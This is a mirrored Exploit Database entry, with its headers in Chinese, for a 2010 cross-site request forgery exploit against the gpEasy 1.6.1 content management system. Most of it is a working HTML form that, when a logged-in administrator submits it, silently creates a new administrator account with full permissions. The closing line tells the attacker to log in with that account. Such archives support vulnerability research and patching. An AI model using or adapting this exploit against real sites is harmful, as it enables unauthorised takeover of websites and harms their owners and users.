gpEasy 1.6.1 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 11 阅读

• 作者： Giuseppe 'giudinvx' D'Inverno
  日期： 2010-04-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12441/

• =============================================
  gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
  =============================================
  
  Author : Giuseppe 'giudinvx' D'Inverno
  Email : <giudinvx[at]gmail[dot]com>
  Date : 04-29-2010
  Site : http://www.giudinvx.altervista.org/
  Location : Naples, Italy
  
  --------------------------------------------------------
  Application Info
  Site : http://www.gpeasy.com/
  Version: 1.6.1
  --------------------------------------------------------
  
  ==============[[ -Exploit Code- ]]==============
  
  <html>
  <form method="post" action="[patth]/index.php/Admin_Users">
  <input type="text" value="xxx" name="username"><br/>
  <input type="password" value="xxx" name="password"><br/>
  <input type="password" value="xxx" name="password1"><br/>
  <input type="text" value="xxx" name="email"><br/>
  <input value="Admin_Menu" type="hidden" name="grant[]">
  <input value="Admin_Uploaded" type="hidden" name="grant[]">
  <input value="Admin_Extra" type="hidden" name="grant[]">
  <input value="Admin_Theme" type="hidden" name="grant[]">
  <input value="Admin_Users" type="hidden" name="grant[]">
  <input value="Admin_Configuration" type="hidden" name="grant[]">
  <input value="Admin_Trash" type="hidden" name="grant[]">
  <input value="Admin_Uninstall" type="hidden" name="grant[]">
  <input value="Admin_Addons" type="hidden" name="grant[]">
  <input value="Admin_New" type="hidden" name="grant[]">
  <input value="Admin_Theme_Content" type="hidden" name="grant[]">
  <input type="hidden" value="newuser" name="cmd">
  <input type="submit" value="Continue" name="aaa" class="submit">
  </form>
  </html>
  
  # Now you have an Admin user with name: xxx and password: xxx, just login
  page [path]/index.php/Admin